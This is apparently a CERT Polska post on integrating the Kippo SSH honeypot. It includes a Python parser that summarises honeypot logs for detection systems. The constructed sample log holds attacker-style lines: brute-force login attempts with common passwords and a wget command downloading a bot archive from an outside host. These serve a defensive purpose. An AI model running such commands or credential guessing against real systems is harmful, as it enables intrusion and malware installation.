In-depth look at Kippo: an integration perspective

Date of publication: 08/04/2013, CERT Polska

Kippo SSH honeypot

Brute-force (dictionary) attacks on Secure Shell (SSH) services remain popular on the Internet. Although hardly sophisticated, they are relatively effective and remain one of the most common intrusion vectors for UNIX servers.

Kippo is a low-interaction honeypot that emulates an SSH service. It can be used to record brute-force attacks aimed at guessing users' SSH passwords. Moreover, it allows the subsequent actions of an attacker who guesses a password, and thereby gains access to the emulated system, to be analyzed: Kippo records every shell command the intruder enters and saves every file they download. In the ENISA study "Proactive Detection of Security Incidents: Honeypots", Kippo was recognized as one of the most useful honeypots for incident response teams and was recommended as easy to deploy.

In addition to the Kippo evaluation carried out by CERT Polska for the above report, Kippo has been tested in depth by researchers from the Network and Information Security Methods Team at NASK during the development of a larger network attack detection system. The aim was to analyze the honeypot from the perspective of integration with other threat detection systems, including automation of its configuration, reconfiguration and operation. The results of these studies are available in a short report (PDF). We hope that it will also be helpful to those who have not yet used Kippo but would like to deploy it.
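As an added illustration of the two points above (what Kippo records, and how that output can be fed to another detection system), here is a small Python parser that turns Kippo-style log lines into per-source summaries. This is example code written for this page, not code from Kippo, NASK or the report. The line format is an approximation of Kippo's text log (login attempts, `CMD:` lines and saved downloads), and the log lines, IP addresses, file paths and the brute-force threshold are all constructed for the example; check the patterns against the log format of the Kippo version you actually deploy before relying on them.

```python
import re
from collections import defaultdict

# Constructed sample input in the style of Kippo's text log. These are NOT real
# captures; the exact wording of each message varies between Kippo versions.
SAMPLE_LOG = """\
2013-04-08 10:15:03+0200 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.5] login attempt [root/123456] failed
2013-04-08 10:15:04+0200 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.5] login attempt [root/password] failed
2013-04-08 10:15:05+0200 [SSHService ssh-userauth on HoneyPotTransport,1,203.0.113.5] login attempt [root/toor] succeeded
2013-04-08 10:15:07+0200 [HoneyPotProtocol,1,203.0.113.5] CMD: uname -a
2013-04-08 10:15:20+0200 [HoneyPotProtocol,1,203.0.113.5] CMD: wget http://198.51.100.7/bot.tgz
2013-04-08 10:15:21+0200 [HoneyPotProtocol,1,203.0.113.5] Saved URL (http://198.51.100.7/bot.tgz) to dl/20130408101521_http___198_51_100_7_bot_tgz
2013-04-08 10:16:00+0200 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.9] login attempt [admin/admin] failed
2013-04-08 10:16:01+0200 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.9] login attempt [admin/admin123] failed
2013-04-08 10:16:02+0200 [SSHService ssh-userauth on HoneyPotTransport,2,198.51.100.9] login attempt [admin/pa/ss] failed
"""

TS = r"(?P<ts>\S+ \S+)"
# Assumed message shapes. The user name is taken up to the first "/" so that a
# password containing "/" (third 198.51.100.9 line above) is still parsed.
LOGIN_RE = re.compile(
    TS + r" \[SSHService ssh-userauth on HoneyPotTransport,(?P<sid>\d+),(?P<ip>[\d.]+)\]"
    r" login attempt \[(?P<user>[^/\]]*)/(?P<pw>[^\]]*)\] (?P<result>succeeded|failed)$")
CMD_RE = re.compile(
    TS + r" \[HoneyPotProtocol,(?P<sid>\d+),(?P<ip>[\d.]+)\] CMD: (?P<cmd>.*)$")
DL_RE = re.compile(
    TS + r" \[HoneyPotProtocol,(?P<sid>\d+),(?P<ip>[\d.]+)\] Saved URL \((?P<url>[^)]+)\) to (?P<path>\S+)$")


def parse_kippo_log(text):
    """Return a list of (kind, fields) events from Kippo-style log text.

    Lines matching none of the patterns (startup messages, connection
    bookkeeping, etc.) are skipped rather than treated as errors.
    """
    events = []
    for line in text.splitlines():
        for kind, rx in (("login", LOGIN_RE), ("cmd", CMD_RE), ("download", DL_RE)):
            m = rx.match(line)
            if m:
                events.append((kind, m.groupdict()))
                break
    return events


def summarize_by_source(events, bruteforce_threshold=5):
    """Aggregate events per attacking IP and tag each source.

    The result is the kind of record another detection system would consume:
    failed-login count, credentials that worked, commands run, files saved.
    The threshold is an arbitrary example value.
    """
    per_ip = defaultdict(lambda: {"failed": 0, "succeeded": [], "commands": [], "downloads": []})
    for kind, f in events:
        entry = per_ip[f["ip"]]
        if kind == "login":
            if f["result"] == "succeeded":
                entry["succeeded"].append((f["user"], f["pw"]))
            else:
                entry["failed"] += 1
        elif kind == "cmd":
            entry["commands"].append(f["cmd"])
        elif kind == "download":
            entry["downloads"].append((f["url"], f["path"]))

    alerts = []
    for ip, e in sorted(per_ip.items()):
        tags = []
        if e["failed"] >= bruteforce_threshold:
            tags.append("bruteforce")
        if e["succeeded"]:
            tags.append("login-success")
        if e["downloads"]:
            tags.append("malware-download")
        alerts.append(dict(ip=ip, tags=tags, **e))
    return alerts


if __name__ == "__main__":
    for alert in summarize_by_source(parse_kippo_log(SAMPLE_LOG), bruteforce_threshold=2):
        print(alert["ip"], alert["tags"], "failed=%d" % alert["failed"],
              "commands=%d" % len(alert["commands"]), "downloads=%d" % len(alert["downloads"]))
```

Per-source aggregation is the natural unit for hand-off to a larger detection system: a source that only trips the brute-force threshold is a different signal from one that logged in and pulled a file, and the saved download path lets a downstream pipeline pick the sample up for analysis. Kippo can also write the same data to a database, which avoids parsing free-text lines altogether; the text-log approach above is shown because it needs nothing beyond the default installation.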

Download the report from here (PDF, 25 pages, 234 KB).